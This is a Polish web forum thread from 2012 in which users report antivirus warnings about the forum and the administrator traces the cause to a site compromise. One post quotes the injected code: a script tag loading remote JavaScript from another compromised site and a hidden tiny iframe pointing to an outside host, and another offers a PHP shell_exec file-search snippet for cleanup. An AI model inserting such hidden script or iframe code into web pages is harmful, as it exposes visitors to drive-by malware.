co za syf na tym forum?
Posted: 11 Jul 2012 14:37
Czy wam też anty wirus pokazuje cały czas info o złośliwym oprogramowaniu?
Mi nie.
Mam antywisrusa McAfee
Page 1 of 1
Posted: 11 Jul 2012 16:27
Posted: 11 Jul 2012 18:43
w pracy mam kasperskiego, pisze, że zagrożenie i nie można wejść na stronę
Posted: 11 Jul 2012 23:29
a co pokazuje dokladnie?
nie wiem co tu zlosliwego moglo sie podlaczyc..
nie wiem co tu zlosliwego moglo sie podlaczyc..
Posted: 12 Jul 2012 00:07
fucktycznie cos sie dokleilo, usunelem, ale podobno wraca jak bumerang. ;)
dawac znak jak nie ok, ale najpierw wyczysccie cache.
dawac znak jak nie ok, ale najpierw wyczysccie cache.
Posted: 12 Jul 2012 14:14
cały czas wyskakuje 
URL: http://otwock.org.pl//relacje/2002.korsy...
Proces: file://C:\Program Files\Mozilla Firefox\...
Infekcja: html:Iframe-inf
URL: http://otwock.org.pl//relacje/2002.korsy...
Proces: file://C:\Program Files\Mozilla Firefox\...
Infekcja: html:Iframe-inf
Posted: 12 Jul 2012 15:18
a teraz? ;)
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie
Posted: 13 Jul 2012 09:23
Chyba wszedzie w forum z automatu dokleja to:behem0th wrote:a teraz?
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie
Code: Select all
tuz za <body> i </body>
script type="text/javascript" language="javascript" src="http://otwock.org.pl//relacje/2002.korsyka/arlesimages/jquery.ui.accordion.min.js" ></script Code: Select all
document.write('iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe');Posted: 13 Jul 2012 09:37
Hakier LUN4T1C0 atakuje !
Posted: 13 Jul 2012 09:48
Anonymous wrote:Albo zrób tak:behem0th wrote:a teraz?
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie
do pliku np szukaj_intruza.php wstaw kod:
i wywolaj go z przegladarki - byc moze zadziala - przeszukuje pliki php na string "accordion" Jesli chcesz przeszukac inne typy zamien -name "*.php" na np -name "*.tpl" itd albo usun wogole wtedy bedzie szukac wszystkoCode: Select all
TAG PRE <?php $cmd = 'find . -type f -name "*.php" -exec grep -H -A2 -B2 "accordion" {} \;'; echo $cmd; echo shell_exec($cmd);
Na wyjsciu bedziesz mial nazwe pliku, nr linii i fragment kodu w kontekscie 2 linii przed i za znalezionym fragmentem
Posted: 13 Jul 2012 09:49
echo $cmd; mozna wywalic jest zbedne 
Posted: 13 Jul 2012 09:59
co za ch.. drugiego sajta tez przyatakowalo.
wcina sie w .httaccess, pliki php i baze tyle ze jak to usune to znow zaraz sie pojawi pewnie..
dzieki za pomoc, pewnie bedzie potrzebna docelowo ;)
wcina sie w .httaccess, pliki php i baze tyle ze jak to usune to znow zaraz sie pojawi pewnie..
dzieki za pomoc, pewnie bedzie potrzebna docelowo ;)
Posted: 13 Jul 2012 12:53
hmmmm ... a te pliki nie powinny być RO ?behem0th wrote:co za ch.. drugiego sajta tez przyatakowalo.
wcina sie w .httaccess, pliki php i baze tyle ze jak to usune to znow zaraz sie pojawi pewnie..
dzieki za pomoc, pewnie bedzie potrzebna docelowo
Michał
Posted: 13 Jul 2012 18:42
atrybuty sa ok, podobno trojan przechwytuje hasla i wchodzi jako wlasciciel, ostatnio mialem infekcje jakiegos syfu wiec by sie zgadzalo, jak tylko sobie przypmne i zmienie na nowe to bedzie dobrze. dorwalem logi, ftpa bedzie czystka :)
Posted: 13 Jul 2012 20:21
powinno byc ok